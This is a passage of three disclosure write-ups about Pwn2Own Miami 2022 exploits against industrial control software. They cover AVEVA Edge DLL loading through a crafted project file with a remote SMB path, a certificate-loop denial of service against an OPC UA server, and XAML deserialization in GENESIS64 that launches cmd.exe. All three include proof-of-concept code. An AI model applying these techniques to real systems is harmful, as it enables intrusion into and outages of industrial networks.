AVEVA Edge can be used to design Human Machine Interfaces (HMI). It allows for the designing of GUI applications, which can be programmed using a scripting language. The screenshot below shows one of the demo projects that come with the installer:

AVEVA Edge

For this category it was acceptable to achieve code execution by opening a project file within the target on the contest laptop. So we tried various things to get code execution from opening a malicious project file. The application has quite some functionalities that might be useful for achieving our goal. Users can add custom controls to a project, it has a powerful scripting language and it will connect to OPC UA servers upon starting, for example. However, most attack surface will require the user to first make one or more clicks within the application; which was not allowed for the competition.

Communication drivers

AVEVA Edge also allows users to add communication drivers to a project. For example is has drivers to allow communication with a Siemens S7 PLC over a serial interface. Drivers in this case are just DLL files that are loaded into the project.

Communication drivers

Drivers are loaded whenever the user loads a project file in AVEVA Edge, which would mean that vulnerabilities here would be triggered without further user interaction.

AVEVA Edge projects consists of multiple files and directories, but the main project file that is also associated with the application is a INI-formatted file using the .app extension. The relevant section for communication drivers can be seen below:

[UsedDrivers]
Count=1
Task0=Driver ABCIP

When looking at the loading process with Procmon we see that drivers are loaded from C:\Program Files (x86)\AVEVA\AVEVA Edge 2020\Drv\:

Lets see what happens if we change the INI file to:

[UsedDrivers]
Count=1
Task0=Driver ..\Computest

Loading the new project shows us:

Interesting :)…

For those interested, the actual loading of the file happens in Bin/Studio.dll at address 0x100c16f1.

Exploitation

From here exploitation is easy, we create a malicious DLL file:

// dllmain.cpp
#include "pch.h"

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    LPSTARTUPINFOA si = new STARTUPINFOA();
    LPPROCESS_INFORMATION pi = new PROCESS_INFORMATION();
    CreateProcessA(NULL, (LPSTR)"calc.exe", NULL, NULL, TRUE, 0, NULL, NULL, si, pi);

    return TRUE;
}

And let it load from an open SMB share:

[UsedDrivers]
Count=1
Task0=Driver \\<IP>\shared\Sector7

You can see the exploit in action in the screen recording below.

Thoughts

Interestingly enough all binaries, including the drivers, that come with AVEVA Edge are digitally signed. However, it appears that signatures are not checked when loading libraries.

Customers who use AVEVA Edge should update to version 2020 R2 SP1 and apply HF 2020.2.00.40, which should mitigate this issue.

We thank Zero Day Initiative for organizing this years edition of Pwn2Own Miami, we hope to return to a later edition!

You can find the other four write-ups here:

Pwn2Own Miami 2022: Unified Automation C++ Demo Server DoS

14 September 2022 at 00:00

This write-up is part 4 of a series of write-ups about the 5 vulnerabilities we demonstrated last April at Pwn2Own Miami. This is the write-up for a Denial-of-Service in the Unified Automation OPC UA C++ Demo Server (CVE-2022-37013).

Confirmed! The team from @sector7_nl leveraged an infinite loop condition to create a DoS against the Unified Automation C++ Demo Server. They earn $5,000 and 5 points towards Master of Pwn. #Pwn2Own #P2OMiami

— Zero Day Initiative (@thezdi) April 20, 2022

OPC UA is a communication protocol used in the ICS world. It is an open standard developed by the OPC Foundation. Because it is implemented by many vendors, it is often the preferred protocol for setting up communication between systems from different vendors in an ICS network.

At Pwn2Own Miami 2022, four OPC UA servers were in scope, with three different “payload” options:

  • Denial-of-Service. Availability is everything in an ICS network, so being able to crash an OPC UA server can have significant impact.
  • Remote code execution. Being able to take over the server.
  • Bypass Trusted Application Check. Setting up a trusted connection to a server without having a valid certificate.

If an client connects with the server it first needs to authenticate using a client certificate. We call this the trusted application check. The protocol also supports user authentication, using either username/password combination or certificates, but this is only after the client application itself has been authenticated. Although OPC UA uses the same X.509 certificates as TLS, the protocol itself is not based on TLS.

For the OPC UA server category we focused on bypassing the trusted application check, as this would gain us the most points. We did not look at remote code execution vulnerabilities. A trusted application means the application can authenticate with a valid certificate. This meant we only had to audit the certificate verification function, which is a very limited scope. We looked at all applications in scope, and in the end did find such a vulnerability in the OPC Foundation OPC UA .NET Standard (you can find the write-up for this vulnerability here).

In the Unified Automation C++ Demo Server we couldn’t find a way to bypass the check, however we did find a reliable Denial-of-Service while reviewing this. Since this Denial-of-Service is in the certificate verification function, it means we can trigger this vulnerability before authentication. In the ICS world where everything revolves around availability, having a vulnerability that allows the attacker to reliably disable a central component is less than ideal.

Certificate verification

Verifying the certificate for a client is handled by the function OpcUa_P_OpenSSL_PKI_ValidateCertificate() in uastack.dll. This function will call OpcUa_P_OpenSSL_CertificateStore_IsExplicitlyTrusted(), which will check if the certificate or any of its issuers are already explicitly trusted. It will do so by walking the certificate chain and checking each certificate if it is equal to a trusted certificate; meaning its SHA1 hash is equal to that of a file under the pki/trusted/certs folder on the server.

The source code for this function seems to be similar to some code from the OPC Foundation, which can be found on GitHub:

static OpcUa_StatusCode OpcUa_P_OpenSSL_CertificateStore_IsExplicitlyTrusted(
    OpcUa_P_OpenSSL_CertificateStore* a_pStore,
    X509_STORE_CTX* a_pX509Context,
    X509* a_pX509Certificate,
    OpcUa_Boolean* a_pExplicitlyTrusted)
{
    X509* x = a_pX509Certificate;
    X509* xtmp = OpcUa_Null;
    int iResult = 0;
    OpcUa_UInt32 jj = 0;
    OpcUa_ByteString tBuffer;
    OpcUa_Byte* pPosition = OpcUa_Null;
    OpcUa_P_OpenSSL_CertificateThumbprint tThumbprint;

OpcUa_InitializeStatus(OpcUa_Module_P_OpenSSL, "CertificateStore_IsExplicitlyTrusted");

    OpcUa_ReturnErrorIfArgumentNull(a_pStore);
    OpcUa_ReturnErrorIfArgumentNull(a_pX509Context);
    OpcUa_ReturnErrorIfArgumentNull(a_pX509Certificate);
    OpcUa_ReturnErrorIfArgumentNull(a_pExplicitlyTrusted);

    OpcUa_P_ByteString_Initialize(&tBuffer);

    *a_pExplicitlyTrusted = OpcUa_False;

    /* follow the trust chain. */
    while (!*a_pExplicitlyTrusted)
    {
        /* need to convert to DER encoded certificate. */
        int iLength = i2d_X509(x, NULL);

        if (iLength > tBuffer.Length)
        {
            tBuffer.Length = iLength;
            tBuffer.Data = OpcUa_P_Memory_ReAlloc(tBuffer.Data, iLength);
            OpcUa_GotoErrorIfAllocFailed(tBuffer.Data);
        }

        pPosition = tBuffer.Data;
        iResult = i2d_X509((X509*)x, &pPosition);

        if (iResult <= 0)
        {
            OpcUa_GotoErrorWithStatus(OpcUa_BadEncodingError);
        }

        /* compute the hash */
        SHA1(tBuffer.Data, iLength, tThumbprint.Data);

        /* check for thumbprint in explicit trust list. */
        for (jj = 0; jj < a_pStore->ExplicitTrustListCount; jj++)
        {
            if (OpcUa_MemCmp(a_pStore->ExplicitTrustList[jj].Data, tThumbprint.Data, SHA_DIGEST_LENGTH) == 0)
            {
                *a_pExplicitlyTrusted = OpcUa_True;
                break;
            }
        }

        if (*a_pExplicitlyTrusted)
        {
            break;
        }

        /* end of chain if self signed. */
        if (X509_STORE_CTX_get_check_issued(a_pX509Context)(a_pX509Context, x, x))
        {
            break;
        }

        /* look in the store for the issuer. */
        iResult = X509_STORE_CTX_get_get_issuer(a_pX509Context)(&xtmp, a_pX509Context, x);

        if (iResult == 0)
        {
            break;
        }

        /* oops - unexpected error */
        if (iResult < 0)
        {
            OpcUa_GotoErrorWithStatus(OpcUa_Bad);
        }

        /* goto next link in chain. */
        x = xtmp;
        X509_free(xtmp);
    }

    OpcUa_P_ByteString_Clear(&tBuffer);

OpcUa_ReturnStatusCode;
OpcUa_BeginErrorHandling;

    OpcUa_P_ByteString_Clear(&tBuffer);

OpcUa_FinishErrorHandling;
}

It will check if the SHA1 hash of the certificate is is the known trusted list. If not, it will continue the while loop, by checking if the issuer (obtained using X509_STORE_CTX_get_get_issuer()) is on the trusted list instead. This will continue until the entire chain has been checked.

However, what if there is a loop in the chain? In that case the while loop will turn into an infinite loop, as there is always some certificate to check. Since the entire network handling occurs in a single thread in the demo application, this will effectively make the server unresponsive for all clients. Creating a nice and effective Denial-of-Service. A loop of length one is a self-signed certificate, which is checked for (the call to X509_STORE_CTX_get_check_issued()), but it is in fact also possible to construct a loop of certificates which is longer.

Our exploit

Our exploit is simple. First we generate two certificates A and B. Since for signing the certificate you only need the private key, we can sign certificate A with the key of B, and B with the key of A. This will create a certificate chain where both certificate have each other as issuer; and thus creating a loop.

def make_cert(name, issuer, public_key, private_key, identifier, issuer_identifier):
	one_day = datetime.timedelta(1, 0, 0)

	builder = x509.CertificateBuilder()

	builder = builder.subject_name(x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, name)]))

	builder = builder.issuer_name(x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, issuer)]))

	builder = builder.not_valid_before(datetime.datetime.today() - (one_day * 7))
	builder = builder.not_valid_after(datetime.datetime.today() + (one_day * 90))
	builder = builder.serial_number(x509.random_serial_number())
	builder = builder.public_key(public_key)
	builder = builder.add_extension(x509.SubjectKeyIdentifier(identifier), critical=False)
	builder = builder.add_extension(x509.AuthorityKeyIdentifier(key_identifier=issuer_identifier, authority_cert_issuer=None, authority_cert_serial_number=None), critical=False)
	builder = builder.add_extension(x509.BasicConstraints(ca=True, path_length=None), critical=False)

	# No idea if all of these are needed, but data_encipherment is required.
	builder = builder.add_extension(x509.KeyUsage(digital_signature=True, content_commitment=True, key_encipherment=True, data_encipherment=True,
		key_agreement=True, key_cert_sign=True, crl_sign=True, encipher_only=False, decipher_only=False), critical=False)

	# The certificate is actually self-signed, but this doesn't matter because the signature is not checked.
	certificate = builder.sign(private_key=private_key, algorithm=hashes.SHA256(), backend=backend)

	return certificate

private_keyA = rsa.generate_private_key(public_exponent=65537, key_size=3072, backend=backend)
public_keyA = private_keyA.public_key()

private_keyB = rsa.generate_private_key(public_exponent=65537, key_size=3072, backend=backend)
public_keyB = private_keyB.public_key()

certA = make_cert("A", "B", public_keyA, private_keyB, b"1", b"2")
certB = make_cert("B", "A", public_keyB, private_keyA, b"2", b"1")

By trying to authenticate at the server using this certificate and including the other as an additional certificate, we can see that eventually we reach a timeout and the server will spin at 100% CPU usage.

You can see the exploit in action in the screen recording below.

Conclusion

OPC UA is often a central component between the IT and OT network of an organisation. Being able to reliably shut it down pre-authentication is a powerful primitive to have. This vulnerability shows yet again that validating certificates is an error prone operation, that should be handled with care.

This issue was fixed in version v1.7.7-549 and was given the CVE number CVE-2022-29862. Unified-Automation now uses the certificate stack that was constructed by OpenSSL for validation.

We thank Zero Day Initiative for organizing this years edition of Pwn2Own Miami, we hope to return to a later edition!

You can find the other four write-ups here:

Pwn2Own Miami 2022: ICONICS GENESIS64 Arbitrary Code Execution

17 October 2022 at 00:00

This write-up is part 5 of a series of write-ups about the 5 vulnerabilities we demonstrated last April at Pwn2Own Miami. This is the write-up for an Arbitrary Code Execution vulnerability in ICONICS GENESIS64 (CVE-2022-33315).

We successfully demonstrated this vulnerability during the competition, however it turned out that the vendor was already aware of this vulnerability. As this was also one of the most shallow bugs we used during the competition, this was something we already anticipated. The bug was originally reported by Zymo Security and disclosed as https://www.zerodayinitiative.com/advisories/ZDI-22-1043/. Luckily, this was the only bug collision we had during this competition.

A 3rd bug collision on Day 1. The team @sector7_nl successfully popped calc, but the bug they used had been disclosed earlier in the competition. They still win $5,000 and 5 Master of Pwn points. #Pwn2Own pic.twitter.com/HCv7DSspwF

— Zero Day Initiative (@thezdi) April 19, 2022

GENESIS64 was one of the two targets in the Control Server category. It is more of a software suite than a single application and can be used to design and visualize entire ICS environments. From dashboards and control screens to visualizing entire factory floors in 3D.

Save files

For this category it was acceptable to achieve code execution by opening a file within the target on the contest laptop. The files must be file types that are handled by default by the target application. So we opened up one of the applications that came with the GENESIS64 installer. We choose GraphWorX64 at random (it is normally used to design HMI/SCADA control screens), and saved an empty file. When looking at the empty project file, we can see it is stored as a WPF XAML file:

<?xml version="1.0" encoding="utf-8"?>
<Canvas Background="#FFFFFFFF" Width="3840" Height="2320" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns:iwm="clr-namespace:Ico.Windows.Media;assembly=IcoWPF" xmlns:gwx="clr-namespace:Ico.Gwx;assembly=GwxRuntimeCore">
    <Canvas.Resources>
        <BitmapImage x:Key="GwxThumbnailImageKey">
        <iwm:BitmapImageInfo.StreamSource>
            <iwm:Base64Stream Data="iVBORw0KGgoAAAANSUhEUgAAAQAAAACaCAYAAABG+Jb3AAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAHqSURBVHhe7dQxAQAgDMCwgX/PwIGLJk8ddJ1ngKT9CwQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAIQZAGTNXLayBTBTZS5DAAAAAElFTkSuQmCC" />
            </iwm:BitmapImageInfo.StreamSource>
        </BitmapImage>
    </Canvas.Resources>
    <gwx:GwxDocument.GwxDocument>
        <gwx:GwxDocument FileVersion="10.97.020.00" ScanRate="500" />
    </gwx:GwxDocument.GwxDocument>
</Canvas>

Using XAML it is possible to directly instantiate objects of arbitrary types. This makes it unsuitable for loading untrusted input files. We quote a small piece of the relevant manual (System.Windows.Markup.XamlReader) from Microsoft regarding the loading of untrusted XAML files:

Code Access Security, Loose XAML, and XamlReader

XAML is a markup language that directly represents object instantiation and execution. Therefore, elements created in XAML have the same ability to interact with system resources (network access, file system IO, for example) as the equivalent generated code does.

The implications of these statements for XamlReader is that your application design must make trust decisions about the XAML you decide to load. If you are loading XAML that is not trusted, consider implementing your own sandboxing technique for how you load the resulting object graph.

Unfortunately GENESIS64 has no such sandboxing technique in place, so instantiating arbitrary objects is trivial. The actual decoding of this file seems to happen in Components/IcoWPF.dll, using a wrapper around XamlReader().

Our exploit

In the end we used the following XAML file for instantiating a Process object and providing it the necessary parameters for starting our beloved calculator. This calls the method Start using the parameters cmd.exe /c calc.exe:

<?xml version="1.0" encoding="utf-8"?>
<ResourceDictionary
    xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
    xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
    xmlns:System="clr-namespace:System;assembly=mscorlib"
    xmlns:Diag="clr-namespace:System.Diagnostics;assembly=system">
    <ObjectDataProvider x:Key="Sector7" ObjectType="{x:Type Diag:Process}" MethodName="Start">
        <ObjectDataProvider.MethodParameters>
            <System:String>cmd.exe</System:String>
            <System:String>/c calc.exe</System:String>
        </ObjectDataProvider.MethodParameters>
    </ObjectDataProvider>
    <gwx:GwxDocument.GwxDocument>
        <gwx:GwxDocument FileVersion="10.97.020.00" ScanRate="500" />
    </gwx:GwxDocument.GwxDocument>
</ResourceDictionary>

You can see the exploit in action in the screen recording below.

Thoughts

To fully mitigate this vulnerability, it would be advised to use a different file format. However, this would also mean that old project files would be unable to load. ICONICS settled for a blocklist approach, with the release of version 10.97.2. In that version, the XAML file is pre-parsed before being passed to XamlReader() and certain classes are excluded from deserialization.

We thank Zero Day Initiative for organizing this years edition of Pwn2Own Miami, we hope to return to a later edition!

You can find the other four write-ups here:

❌
❌